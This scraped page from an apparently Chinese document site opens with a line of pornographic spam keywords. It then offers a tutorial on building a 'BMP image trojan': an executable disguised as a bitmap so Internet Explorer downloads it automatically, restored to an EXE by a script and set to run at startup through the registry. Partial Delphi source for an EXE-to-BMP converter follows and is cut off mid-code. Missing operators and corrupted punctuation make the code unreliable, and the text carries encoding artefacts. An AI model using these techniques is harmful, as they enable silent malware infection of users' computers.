freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

正文內(nèi)容

制作圖片木馬教程(如何制作圖片木馬)(已修改)

2025-08-03 00:46 本頁面
 

【正文】 何謂BMP網(wǎng)頁木馬?它和過去早就用臭了的MIME頭漏洞的木馬不同,MIME木馬是把一個EXE文件用MIME編碼為一個EML(OUT LOOK信件)文件,放到網(wǎng)頁上利用IE和OE的編碼漏洞實現(xiàn)自動下載和執(zhí)行。 然而BMP木馬就不同,它把一個EXE文件偽裝成一個BMP圖片文件,欺騙IE自動下載,再利用網(wǎng)頁中的JAVASCRIPT腳本查找客戶端的Internet臨時文件夾,找到下載后的BMP文件,把它拷貝到TEMP目錄。再編寫一個腳本把找到的BMP文件用DEBUG還原成EXE,并把它放到注冊表啟動項中,對于2K、XP來說是無能為力了。 看上去好象很復雜,下面我們一步一步來: 1) EXE變BMP的方法 大家自己去查查BMP文件資料就會知道,BMP文件的文件頭有54個字節(jié),簡單來說里面包含了BMP文件的長寬、位數(shù)、文件大小、數(shù)據(jù)區(qū)長度。我們只要在EXE文件的文件頭前面添加相應的BMP文件頭(當然BMP文件頭里面的數(shù)據(jù)要符合EXE文件的大小啦),這樣就可以欺騙IE下載該BMP文件,開始我們用JPG文件做過試驗,發(fā)現(xiàn)如果文件頭不正確的話,是不會下載的,轉換代碼如下: program exe2bmp。 uses Windows, SysUtils。 var len,row,col,fs: DWORD。 buffer: array[0..255]of char。 fd: WIN32_FIND_DATA。 h,hw: THandle。 begin if (ParamStr(1)39。39。) and(ParamStr(2)39。39。) then begin //如果運行后沒有兩個參數(shù)則退出 if FileExists(ParamStr(1)) then begin FindFirstFile(Pchar(ParamStr(1)),fd)。 fs:=。 col := 4。 while true do begin if (fs mod 12)=0 then begin len:=fs。 end else len:=fs+12(fs mod 12)。 row := len div col div 3。 if rowcol then begin col:=col+4。 end else Br
點擊復制文檔內(nèi)容
規(guī)章制度相關推薦
文庫吧 www.dybbs8.com
公安備案圖鄂ICP備17016276號-1